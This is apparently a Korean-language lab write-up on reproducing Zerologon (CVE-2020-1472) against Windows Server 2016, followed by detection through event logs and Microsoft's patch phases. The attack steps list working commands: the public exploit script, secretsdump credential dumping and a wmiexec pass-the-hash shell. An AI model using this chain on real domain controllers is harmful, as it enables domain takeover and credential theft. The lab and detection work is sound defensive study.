Zerologon_CVE-2020-1472
목표
이 취약점 연구는 탐지 및 완화 목적으로 Kali Linux를 통해 Windows Server 2016에서 Zerologon을 시뮬레이션하기 위한 통제된 환경을 구축하는 것을 목표로 했습니다. 주요 초점은 취약점 침투 테스트를 수행하고, 데스크톱 사용자로 로그인하지 않고도 데스크톱을 제어할 가능성을 보여주는 동시에 취약점을 탐지하고 완화하는 것이었습니다.
습득한 기술
- Windows 이벤트 뷰어에 대한 고급 이해
- Kali Linux 및 Impacket 사용 능숙도
- Zerologon 수행 능력
사용된 도구
Zerologon 구현 단계
Kali Linux
- sudo su to root user
- git clone https://github.com/dirkjanm/CVE-2020-1472
- cd /home/kali/impacket/examples/CVE-2020-1472 (자신의 디렉터리에 맞게 디렉터리를 변경하십시오)
- /cve-2020-1472-exploit.py -n [NETBIOS] -t [IPaddress]
- secretsdump.py -no-pass -just-dc [NETBIOS/User]$@[IP adress]
- wmiexec.py [Domain/User@IP] - hashes [hash]
Zerologon 탐지 단계
Windows
중요 보안 기능 비활성화
- 이벤트 뷰어를 확인합니다.
- 서버 관리자에서 Windows 로그, 보안을 선택하고 이벤트 ID 4624(사용자 로그온 이벤트)를 찾습니다.
Zerologon의 징후
- 로그의 주체(Subject)는 NULL SID로 표시됩니다.
- 이 로그온에는 관리자 권한도 부여되어 있어야 합니다.
- 로그 4742(NT Authority가 공격자임)를 확인할 수도 있습니다.
패치 단계
Microsoft는 Windows Server(2008, 2016, 2019)를 보호하기 위해 사용 가능한 패치를 개발했습니다. 이는 다음과 같이 계획되었습니다. 첫 번째 단계에서 첫 번째 패치(8월 패치)를 다운로드하면 도메인은 비준수 장치로부터 다른 연결된 장치를 보호할 수 있으며, 명시적 예외를 두고 모든 가입 장치를 보호하는 옵션이 제공됩니다.
두 번째 패치(다음 해 2월 패치)인 적용(강제) 단계에서는 설치 시 모든 Windows 및 비 Windows 장치가 Netlogon과 함께 보안 원격 프로시저 호출(RPC)을 사용하도록 강제됩니다. 또는 특정 신뢰할 수 있는 장치를 명시적으로 허용할 수도 있습니다. 본질적으로 비준수 컴퓨터를 도메인에서 내보내는 것입니다.